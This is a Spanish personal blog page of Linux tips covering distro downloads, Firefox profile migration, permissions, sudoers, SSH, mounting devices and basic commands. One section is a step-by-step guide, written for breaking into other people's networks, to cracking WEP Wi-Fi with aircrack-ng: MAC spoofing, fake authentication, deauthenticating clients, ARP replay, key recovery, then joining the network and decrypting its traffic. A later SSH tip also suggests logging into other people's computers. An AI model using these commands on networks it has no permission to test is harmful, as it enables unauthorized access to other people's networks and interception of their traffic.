Blogia
Angel

Informatica: Linux

Descargar gratis Linux

Hablando de Linux, y me doi cuenta de que aun no he comentado ésto...

Para los que no conozcais muy bien el sistema operativo Linux, es software libre, por lo que la mayoria de sus compilaciones son gratuitas, yo utilizo Ubuntu, pero hay mucho donde elegir.

Deveriais tener en cuenta estas paginas:

http://www.linux.com/

http://www.ubuntu.com/

Lo malo es que la mayoria de webs interesantes sobre linux están en ingles, por ello ayudad a traducirlo, y creemos una comunidad hispana de Linux.

Aqui teneis varias versiones gratuitas de Linux:

http://www.linux.com/download_linux/

Aunque con poner en un buscador "descarga linux" os apareceran muchos, y todos gratis ^^

Copiar configuración mozilla firefox de windows a linux

En algunas versiones de linux te dan la opción de importar configuraciones de otras particiones y programas, pero no en todas.

La forma segura de copiar dichas configuraciones es ir a la partición de donde queremos copiar la configuración, siendo windows se encontrara en “/media/windows/Documents and Settings/NOMBRE DE USUARIO/Datos de programa/Mozilla/Firefox“, copias el contenido de la carpeta, y lo pegamos en "/home/NOMBRE DE USUARIO/DESCKTOP O ESCRITORIO/.mozilla/firefox". Ten cuidado ya que .mozilla es una carpeta oculta. En "NOMBRE DE USUARIO" es tu nombre de usuario, y en "DESCKTOP O ESCRITORIO" esque segun la versión estara en ingles o español.

Con esto copiaras complementos, extensiones, y configuraciones de firefox ^^ 

Analisis de contraseñas de redes con Back Track 2

Podemos trabajar directamente desde el CD sin instalar el Back Track 2, pero alguno de los procesos necesarios para piratear redes como el airmon necesitan guardar archivos, para luego trabajar con ellos, asique necesitaríamos montar alguna partición o disco extraible para poder trabajar en el. Para ello: Montar/Desmontar dispositivos

 

Login: root toor (por ejemplo)
#starx

Empezamos entorno grafico:(Pero trabajaremos por terminal)
Tener cuidado ya que el teclado estara configurado en USA
#df -Th dice las particiones que tengo
Deveriamos introducirnos en alguna de las particiones y trabajar sobre ella creando una carpeta para guardar alli las aplicaciones.

Averiguaremos de que targeta disponemos con #iwconfig #ifconfig (targeta que nos diga $iwconfig, consideraremos que es ra0)
La apagaremos #ifconfig ra0 down
Cambiaremos la mac(solo mientras se encuentre encendido el pc en esta sesion) (se puede hacer por ifconfig....pero....)
#macchanger --help
#macchanger --mac=00:11:22:33:44:55 ra0
La encenderemos #ifconfig ra0 up

#airmon-ng muestra la lista de targetas y los drivers asociados a estas targetas
#airmon-ng start ra0 modo monitor a la targeta(escuchar todo, aunque no vaya a ella)

#airodump-ng muestra por pantalla puntos de acceso disponibles, y sus clientes asociados a ellos
#airodump-ng ra0 BSSID(mac),PWR(potencia con la que te llega),Beacons(faros, solo afecta en lo que vaya a tardar en aparecernos en la lista de redes disponible),#Data(paquetes con vectores de iniciacion(los que registraremos con la opcion -ivs)),MB(megabytes por segundo de la inalambrica(no tiene que ver con su conexion a internet), ENC(OPN=abierta,WPA,WEB,?=no lo tiene claro),ESSID(nombre del puesto),STATION(mac del cliente)
Si donde nos colamos tiene filtrado mac devemos ver a algun cliente, y cuando no este conectado suplantarlo.
Para capturar solo los paquetes con devilidad criptografica con los que trabajaremos:
#airodump-ng --ivs --write (nombrefichero) --channel (nºcanal)
Necesitamos 2millones de ivs para obtener buenos resultados, en total deven ocupar menos de 40MB...si vemos que los genera muy lentamente tenemos que forzar la aparicion de trafico, para ello en otra ventana hacemos esto:
#aireplay-ng
#aireplay-ng --fakeauth 30 -e iesciervaC14 -a 00:20:a6:50:26:d0 fakeauth es el tiempo ciclico con el que se conecta de nuevo en segundos, e es el punto de acceso al que nos conectamos, a es la BSSID de dicha targeta(mac)
Si no nos aceptasen el trafico generado lo que haremos sera a un usuario que veamos conectado le desautentificariamos una y otra vez, que igualmente generara el trafico que deseamos, = que si nosotros produgeramos el trafico:
#aireplay-ng -0 .... (-0 en vez de --fakeauth)(buscar + info)

#aireplay --arpreplay -e (nombretargeta) -a (BSSID) -b (BSSID) -h (nuestramac) -x (veces/s) ra0
-arpreplay es el tipo de ataque, -a y -b uno es un filtro y el otro la targeta a la que atacas, -x son las vees por segundo que lo reintentara

Cuando tengamos suficientes ivs usaremos la orden:
#aircrack-ng
#aircrack-ng -a 1 -b ((BSSID) mac punto de acceso) *.ivs
Se puede ejecutar antes de terminar la captura, puede cortarse, pero con relanzarlo basta.
Te dara la contraseña en hexadecimal y en texto.

Sacamos la targeta de modo monitor #airmon-ng stop ra0
Para conectarse con la contraseña obtenida #iwconfig key s:(contraseña de texto) ra0
o #iwconfig key (contraseña hexadecimal) ra0

Falta la IP y tal, se suele configurar con #dhclient ra0, pero si no funciona tenemos que poner a mano al ruter la mascara,IP....para ello tendriamos que averiguar en que subred nos encontraremos, con wireshark porejemplo.

Para desencriptar IPs mediante wireshark:
Opciones>Protocolo>802.11>keys (introducimos la contraseña obtenida)
La maquina que más recivira sera el router ya que todo pasa por el.


aircrack-ptw 1.0.0 en vez de usar .ivs usa .cap, por lo que en la orden de captura de trafico tendriamos que omitir el --ivs.

La gente suele usar siempre las mismas contraseñas simples, por lo que diccionarios pequeños de contraseñas pueden ser muy efectivos, unos muy buenos son aspell y myspell, ambos en ingles y español.

Atacando redes WEP si tienen autentificacion de shared key es facil descifrarlo mediante ataques chopchop o defragmentacion.

Averiguar quien esta conectado a tu pc por terminal

Abre terminal y escribe who

Ya está, a que es sencillo ^^ 

Es como netstat de windows .

ssh

Para "comunicarte" mediante ssh se introduce en terminal:
ssh -l (usuario) (IP)
Ejemplo: ssh -l Did 123.0.0.1

 

Hay por ai muchos hackers, pues esto es 1forma de impedir que se metan a tu pc a traves de 1red LAN. Consiste en modificar el puerto de acceso para el ssh, y solo hay que cambiar 1par de renglones en 2ficheros:

etc/ssh/ssh_config
etc/services

Cerca del principio de ssh_config hay 1linea comentada donde dice tal que "#port 22", quizas salga otro numero, pero eso no importa, solo hay que quitarle la "#", y cambiar el numero que salga por otro cualquiera de los que permita los puertos(0a65535); Y en services saldran 2renglones seguidos donde diga "ssh noseq 22), el noseq es diferente segun la version de linux, pero no lo cambieis, en services cambiad solo los dos 22 que salen donde os he dicho por el mismo numero que hayais puesto en ssh_config, y entonces para meterse a tu pc por LAN necesitaran saber ese numero.

Los puertos del 0 al 1023 suelen estar ocupados por otros programas, asique no es recomendado usarlos.

 

Pero todo tiene su truco... Si descubres el puerto de otro pc y te quieres meter en él prueba esto:
ssh -l (usuario) -p (puerto) (IP)
Ejemplo: ssh -l asi1-17 -p 1010 172.16.14.13

Crear enlaces (accesos directos)

Existen enlaces fisicos y simbolicos:

-Fisico: ocupa el mismo espacio que el original, si borras el original sigue funcionando, para crearlo:
ln (origen) (destino)
Ejemplo: ln /home/asi/money /home/asi/Desktop/money
Copiaria el archivo money al escritotio, tambien se le puede cambiar el nombre al destino.
Ejemplo: ln /home/asi/money /home/asi/Desktop/dinero

-Simbolico: ocupa el espacio que ocupe la ruta, si borras el original deja de funcionar, para crearlo:
ln -s (origen) (destino)
Ejemplo: ln -s /home/asi/fotos/Yo /home/asi/Desktop/Otros/Yo

Información de ls -l, y como cambiarla

Al introducir "ls -l" en la terminal os aparecera una lista de informacion parecida a esta "- rwx rw- --- 1 asi1-23 asi1 13 2007-03-05 10:47 Otros", aqui os explico que significa cada simbolo, los numeros de la linea de debajo son para ordenar para que sirve cada simbolo del "ls -l":

- rwx rw- --- 1 asi1-23 asi1 13 2007-03-05 10:47 Otros

1 222 333 444 5 666666 777 88 99999999999999 00000

1-Indica si es:
- Archivo regular
d Directorio
l Enlace simbolico(acceso directo)

234-Permisos: 2:Usuario,3:Grupo de usuarios,4:Otros
- Sin Permiso
r Lectura
w Escritura
x Ejecutar

5-Numero de enlaces fisicos

6-Usuario propietario

7-Grupo porpietario

8-Tamaño de archivo

9-Fecha y hora

0-Nombre del archivo

Los permisos se cambian con "chmod", y hay varias maneras de usarlo:

 Metodo no numerico:

chmod ABC (nombre archivo)

A se cambia por u,g,o, o varias de ellas a la vez, para poner toda se pone a, u=usuario,g=grupo,o=otros,a=ugo
B +,-,= añadir,quitar,igualar
C r,w,x (Permisos de lectura,escritura,ejecucion)

Si el hueco A se deja en blanco se considera que se han puesto ugo si el C se deja en blanco es no poner ningun permiso.

Ejemplo: chmod ug+r Otros
chmod uo-rwx Otros/g/Hola.txt
chmod = Otros

Metodo octal:

chmod 000 (nombre fichero)

Si tiene permiso se pone 1, si no se pone 0, en total salen 9digitos de 0s y 1s, se agrupan de 3 en 3, y se escribe de forma octal.

Ejemplo: rwx r-x r--
111101100
7 5 4
chmod 754 Otros

 

Cambiar de propietario:
-Usuario propietario: chown (usuario) (archivo o directorio)
-Grupo propietario: chgrp (grupo) (archivo o directorio)

Para que solo quien tu quieras pueda usar SUDO

El archivo "/etc/sudoers" decide quien tiene permisos para hacer que aplicaciones.

Vereis algunas lineas de uno de estos dos tipo:

(usuario) ALL=(ALL) ALL
%(grupo) ALL=(ALL) ALL

Solo teneis que eliminar todas estas lineas y poner los usuarios y grupos que querais que puedan usar sudo.
Ejemplo: Si en tu pc se puede meter cualquiera y quieres que solo tu y yo tengamos permisos....

Al abrirlo pone por ejemplo:
root ALL=(ALL) ALL
%empresa ALL=(ALL) ALL
%casa ALL=(ALL) ALL

Borrariamos lo anterior y escribiriamos:
tu ALL=(ALL) ALL
yo ALL=(ALL) ALL

Este fichero esta muy protegido, por lo que para cambiarlo deveriamos estar en "sudo bash", y no recomiendo quitarle los permisos a root, por lo que se deveria dejar, y si no quieres que nadie se meta con ese usuario cambiale la contraseña.

Montar/Desmontar dispositivos

Montar dispositivos

En linux, para utilizar un dispositivo como por ejemplo el floppy(disquete), cd-rom, camara digital, pen-drive, alguna partición, o alguna unidad de red compartida, antes hemos de montarlo. Todos los dispositivos los montamos en un directorio, y utilizaremos ese directorio para acceder al dispositivo; una vez montado podemos navegar por el CD, memoria flash, etc, como si se tratara de un directorio cualquiera del sistema linux.

1º Identificando los dispositivos

Antes de empezar, hemos de saber donde están físicamente los dispositivos (sobre todo en el caso de querer montar particiones, un CD, o cualquier dispositivo conectado a un cable IDE). Esto es porque en GNU/Linux se utiliza una nomenclatura que asigna nombres según donde están conectados.

Al dispositivo conectado como master en el IDE primario se le llama hda
Al dispositivo conectado como esclavo en el IDE primario se le llama hdb
Al dispositivo conectado como master en el IDE secundario se le llama hdc
Al dispositivo conectado como esclavo en el IDE secundario se le llama hdd
Si tuvieran más, seguiría de la misma manera, con hde, hdf, ...

Para los dispositivos scsi se usa la nomenclatura sda, sdb, ...

Además, si el dispositivo es un disco duro, las particiones se numeran. Por ejemplo, la primera partición en el disco hda es hda1 la segunda hda2, etc. Los dispositivos se encuentran en el directorio /dev, así que nos referiremos a ellos como: /dev/hda1, /dev/hdc, /dev/sdb, ...

2ºMontando los dispositivos

Se hace con el comando mount; su sintaxis básica es la siguiente:

mount -t (sistema de ficheros) -o (opciones) (dispositivo) (punto de montaje)

Los parámetros más comunes y útiles son:

-Sistema de ficheros:

-- ext2 o ext3 Para particiones Linux que usen ese sistema de ficheros.
-- vfat Para particiones Windows que usen fat32.
-- ntfs Para particiones Windows que usen NTFS. NTFS puede dar cierta incompatibilidad con linux, por lo que es recomendable no escribir en el, (solo leerlo), para lo cual usaríamos la opción ro(explicada debajo).
--iso9660 para CD-roms.

-Opciones de montaje:

-- ro El dispositivo se monta con permisos de solo lectura
-- rw El dispositivo se monta con permisos de lectura/escritura
-- user Cualquier usuario puede montar y desmontar el dispositivo, por defecto solo lo puede hacer root
-- auto El dispositivo se monta automáticamente al iniciar (o cuando usamos la opción -a)
-- defaults Para emplear las opciones predeterminadas: rw, suid, dev, exec, auto, nouser, async.
-- uid=(ID usuario) Para permitir que (aparte de root) el usuario con esa ID pueda montar el dispositivo. (Para saber la ID de un usuario usaremos el comando id (usuario) , si no especificamos dira el ID del usuario actual)
-- gid=(ID grupo) Para permitir que (aparte de root) los usuarios con esa ID de grupo puedan montar el dispositivo. (Para saber la ID de un grupo usaremos el comando id (grupo) )

Las opciones se ponen separadas por comas, ejemplo: -o ro,auto,user

-Dispositivo:

Se refiere al dispositivo que queremos montar, por ejemplo /dev/hda3 si es una partición, /dev/hdc si es un cd-rom, ... Si no sabemos donde tenemos nuestro dispositivo podemos usar (como root) el comando:
# dmesg | grep hd
Y nos saldrá una lista de los dispositivos que tenemos. Sólo tenemos que identificar cuál es el que queremos.

-Punto de montaje:

Es el directorio donde queremos montarlo. Normalmente es un subdirectorio dentro de /mnt . Este directorio debe existir antes de montar el dispositivo. Si no existe podemos crearlo antes con:

mkdir (nombre del directorio)

3ºEjemplos prácticos

Monta la segunda partición del disco primario del primer IDE en el directorio /mnt/linux con permisos de lectura/escritura, asumiendo el sistema de ficehros ext3.
# mount -t ext3 -o rw /dev/hda2 /mnt/linux

Monta una partición fat32 que está en el disco secundario del primer IDE, en el directorio /mnt/windows.
# mount -t vfat -o defaults /dev/hdb1 /mnt/windows

Monta en /mnt/disquet el floppy con permisos de lectura/escritura''.
# mount -t vfat -o rw /dev/floppy /mnt/disquet

Monta un cd-rom (si hdc es el cdrom) en /mnt/cdrom con permisis de lectura y ejecución de binarios.
# mount -t iso9660 -o ro,exec /dev/hdc /mnt/cdrom

Monta un pendrive usb con sistema de ficheros fat32 y con permisos de lectura y escritura.
# mount -t vfat -o rw /dev/sda1 /mnt/pendrive





Desmontar dispositivos

Es muy importante desmontar los dispositivos antes de desconectarlos, porque si no lo hacemos puede que se estropeen los datos del dispositivo. Para ello tenemos el comando umount. Su sintaxis es:
umount (dispositivo)
o bien
umount (punto de montaje)
Por ejemplo para desmontar el CD-Rom usariamos:
# umount /mnt/cdrom
o bien
# umount /dev/hdc





Automatizando el montaje de dispositivos

En GNU/Linux podemos automatizar el montaje de dispositivos, para no tener que hacerlo manualmente cada vez, de una forma muy sencilla, añadiendo las entradas correspondientes al fichero /etc/fstab
En el aranque del sistema, se montan todos los dispositivos que aparecen en este fichero y tienen la opción auto. Cada línea del fichero corresponde a un dispositivo y a cómo va a montarse. Su sintaxis es:

(dispositivo) (punto montaje) (sistema ficheros) (opciones) (dump) (pass)

Todos los parámetros los hemos visto excepto dump y pass. dump se usará para saber qué dispositivos necesitan ser volcados, y pass para determinar el orden en que se chequearán los sistemas de ficheros cuando el sistema arranca. Nosotros dejaremos ambos a 0.

Según la distribución que usemos, ya tendremos más o menos entradas en ese fichero (siempre tendremos una entrada para la partición raíz /). Pero podemos añadir las entradas que necesitemos.

Ejemplos prácticos:


/dev/hda2 /mnt/linux ext3 rw,user,auto 0 0
/dev/hdb1 /mnt/windows vfat defaults,auto 0 0
/dev/floppy /mnt/disquet vfat rw 0 0
/dev/hdc /mnt/cdrom iso9660 ro,user,noauto,exec 0 0
/dev/sda1 /mnt/pendrive vfat rw,user,auto 0 0

Añadiendo estas líneas al fichero /etc/fstab conseguiríamos que se montaran automáticamente al arrancar el sistema los dispositivos que lleven la opción auto.
Además, estamos especificando la información para cada dispositivo, como por ejemplo qué dispositivos puede montar cualquier usuario, etc.

Montarlo de esta forma es posible ya que al montar el dispositivo, el sistema operativo verá que está definido en el fichero /etc/fstab y leerá de ahí las opciones para montarlo. Por lo que podemos abreviar la orden mount. Por eso es interesante definir en él todos los dispositivos que montemos habitualmente, no tan sólo los que se montan automáticamente al iniciar.
Si no tenemos un dispositivo montado aún, pero tiene una entrada definida en el fichero, podemos montarlo de una forma tan simple como:
mount (dispositivo)
o
mount (punto montaje)



Recordad que para la mayoría de estas ordenes debeis ser root:
$sudo bash

Ejecutar programas como admin en ventanas sin terminal

La orden para administrador en ventanas es gksu. Al crear un acceso directo que querais usar como administradores, en "Comando:" poned "gksu (direccion del fichero)".

No useis gksu para abrir por ejemplo firefox, pero si viene bien para tener un explorador como administrador, o algun editor de texto, o el synaptic...

Por ejemplo recomiendo poner en el escritorio, o menu inicio, un icono con la orden "gksu (navegador)" (por ejemplo: gksu nautilus. Asi podreis mover, borrar, y trabajar con las carpetas del explorador como administradores, pero recordad que sois administradores, y no hagais estropicios, para hacer tonterias usad el explorador sin permisos de administrador.
Se haria de esta manera para ponerlo en el menu inicio: Clicas en la barra con el boton derecho, añadir al panel, lanzador personalizado:
Tipo: Aplicacion
Nombre: gksu nautilus
Comando: gksu nautilus
Comentario: (lo que quieras)
Icono: (el que quieras)

Sudo solo sirve para terminal, no funciona correctamente trabajando con ventanas, y gksu lo contrario. (Puede variar el comando segun version de linux)

Comandos basicos

La tecla Tabulador sirve para autocompletar nombres de archivos y directorios.

sudo bash
modo administrador

sudo (tarea)
administras esa tarea

man comando
Muestra ayuda sobre el comando especificado

passwd nombreusuario
Cambia la contraseña al usuario especificado

Who
muestra informacion de los usuarios conectados al equipo

clear
borra la pantaya del terminal

cp nombrefichero carpetadestino
copia uno o varios ficheros a la carpeta especificada

mv nombrecarpeta carpetadestino
mueve una carpeta/fichero al destino especificado, también renombra

rm nombrefichero
Borrar el fichero especificado
rm -f: no pide confirmación al eliminar.
rm -r: elimina recursivamente carpetas y subcarpetas y su contenido.
rm -v: muestra el nombre de los ficheros y carpetas que va eliminando.

cd nombredirectorio
Cambia del directorio actual al directorio especificado

mkdir nombredirectorio
Crea un directorio

ifconfig
Muestra la IP del pc y la configuración de red

ping host
Realiza ping entre pcs

ls -l
Lista los ficheros y directorios de la ubicación actual

vi fich
abre el editor vi del archivo.

at [-lr] hora [fecha]
Ejecuta un comando mas tarde

ls -la
Lista los ficheros y directorios (incluyendo ocultos)de la ubicación actual

which (programa)
Te dice la ruta del programa

top
Lista de programas en ejecucion (es como el administrador de tareas de windows), si quieres cerrar una aplicacion haz top, busca la aplicacion y apuntate el numero que aparece, y pulsa "k (numero)".